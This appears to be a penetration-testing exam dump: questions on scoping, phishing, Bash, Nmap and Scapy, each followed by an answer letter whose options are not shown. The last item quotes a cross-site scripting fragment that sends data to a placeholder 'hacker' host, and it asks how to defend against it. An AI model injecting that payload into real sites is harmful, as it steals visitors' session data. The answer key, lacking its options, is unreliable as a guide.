Which of the following documents describes specific activities, deliverables, and schedules for a penetration tester?
Correct Answer:C
A company conducted a simulated phishing attack by sending its employees emails that included a link to a site that mimicked the corporate SSO portal. Eighty percent of the employees who received the email clicked the link and provided their corporate credentials on the fake site. Which of the following recommendations would BEST address this situation?
Correct Answer:A
When developing a shell script intended for interpretation in Bash, the interpreter /bin/bash should be explicitly specified. Which of the following character combinations should be used on the first line of the script to accomplish this goal?
Correct Answer:E
A penetration tester ran an Nmap scan on an Internet-facing network device with the –F option and found a few open ports. To further enumerate, the tester ran another scan using the following command:
nmap –O –A –sS –p- 100.100.100.50
Nmap returned that all 65,535 ports were filtered. Which of the following MOST likely occurred on the second scan?
Correct Answer:A
A security professional wants to test an IoT device by sending an invalid packet to a proprietary service listening on TCP port 3011. Which of the following would allow the security professional to easily and programmatically manipulate the TCP header length and checksum using arbitrary numbers and to observe how the proprietary service responds?
Correct Answer:C
https://0xbharath.github.io/art-of-packet-crafting-with-scapy/scapy/creating_packets/index.html
Given the following code:
[removed]var+img=new+Image();img.src=”http://hacker/ + [removed];[removed]
Which of the following are the BEST methods to prevent against this type of attack? (Choose two.)
Correct Answer:BE